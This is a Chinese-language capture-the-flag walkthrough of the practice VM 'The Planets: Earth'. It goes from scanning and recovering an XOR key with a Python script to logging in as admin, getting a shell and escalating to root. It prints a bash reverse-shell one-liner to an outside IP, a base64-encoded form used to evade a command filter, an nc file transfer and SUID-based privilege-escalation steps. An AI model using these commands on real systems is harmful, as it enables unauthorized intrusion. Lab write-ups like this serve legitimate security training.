每周打靶练习之The Planets：Earth

首先下载虚拟机然后放在VMware里打开，选择NAT模式开机.

然后对该网段进行一个主机存活扫描发现192.168.13.133开启80，443，22端口进行访问

访问发现不管是80还是443端口都是报错我们重新全部的扫描一下

Nmap -A 192.168.13.133发现该主机开启了dns域名解析。怪说不得刚刚访问会出现400

接下来我们去修改一下我们本地的hosts文件

然后我们通过域名访问earth.local

在最下面发现了几串Previous Messages:

接下来对目录进行一个扫描发现了后台登录页面

访问earth.local/admin/login发现需要用户密码试了下弱口令没有成功

再扫描一下另外一个域名terratest.earth.local发现robots.txt文件

尝试txt后缀发现可以访问

Testing secure messaging system notes:

*Using XOR encryption as the algorithm, should be safe as used in RSA.

*Earth has confirmed they have received our sent messages.

*testdata.txt was used to test encryption.

*terra used as username for admin portal.

Todo:

*How do we send our monthly keys to Earth securely? Or should we change keys weekly?

*Need to test different key lengths to protect against bruteforce. How long should the key be?

*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.

测试安全邮件系统注意事项：

*使用 XOR 加密作为算法，在 RSA 中使用时应该是安全的。

*地球已确认他们已收到我们发送的消息。

*testdata.txt用于测试加密。

*terra 用作管理门户的用户名。

待办事项：

*我们如何安全地将每月密钥发送到地球？还是我们应该每周更换一次密钥？

*需要测试不同的密钥长度以防止暴力破解。密钥应该有多长？

*需要改进消息界面和管理面板的界面，目前非常基础。

这里我们得到了新的信息，加密算法是 XOR，并且有一个testdata.txt文档用于测试加密，用户名是terra，先访问testdata.txt并保存

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

这个时候就要用到我们当时看到的Previous Messages了，运用python编写脚本选一个Previous Messages数据，然后与 testdata.txt 进行一下 XOR 运算，得到密钥

import binascii

key="2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"

testdata="According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."

a = binascii.b2a_hex(testdata.encode()).decode()

b = binascii.a2b_hex(hex(int(a,16) ^ int(key,16))[2:]).decode()

print(b)

earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat

密码是一直重复的earthclimatechangebad4humans，然后使用用户名 terra ，密码：earthclimatechangebad4humans 登录 https://earth.local/admin

然后准备反弹shell，执行命令bash -i >& /dev/tcp/192.168.64.46/2500 0>&1发现禁止远程连接

这种情况下可以写入一句话木马或者对反弹shell进行编码绕过，我看了一下大家的可以尝试base64进行绕过。

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY0LjQ2LzI1MDAgMD4mMQ==

使用以下命令，成功绕过限制，反弹shell。

Bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY0LjQ2LzI1MDAgMD4mMQ==}|{base64,-d}|{bash,-i}'

查看是否有python环境，接下来用python反弹交互式shell， python3 -c 'import pty;pty.spawn("/bin/bash")'

接下来就是提权了

查找有权限的命令： find / -perm -u=s -type f 2>/dev/null

发现有一个/user/bin/reset-root可以利用一下，因为这个文件名就叫重置root用户，作者提示已经很明显了！

本地没有调试的命令，使用nc传送到本地调试一下

nc -nlvp 1234 >reset_root

nc 192.168.64.46 1234 < /usr/bin/reset_root

使用 strace 命令进行调试

因为没有以下三个文件而报错，查看靶机发现也没有这三个文件： access("/dev/shm/kHgTFI5G", F_OK)      = -1 ENOENT (没有那个文件或目录)

access("/dev/shm/Zw7bV9U5", F_OK)      = -1 ENOENT (没有那个文件或目录)

access("/tmp/kcM0Wewe", F_OK)          = -1 ENOENT (没有那个文件或目录)

所以我们要去靶机里面创建这个文件

然后再在靶机中运行reset-root就已经提升为root权限了

拿到flag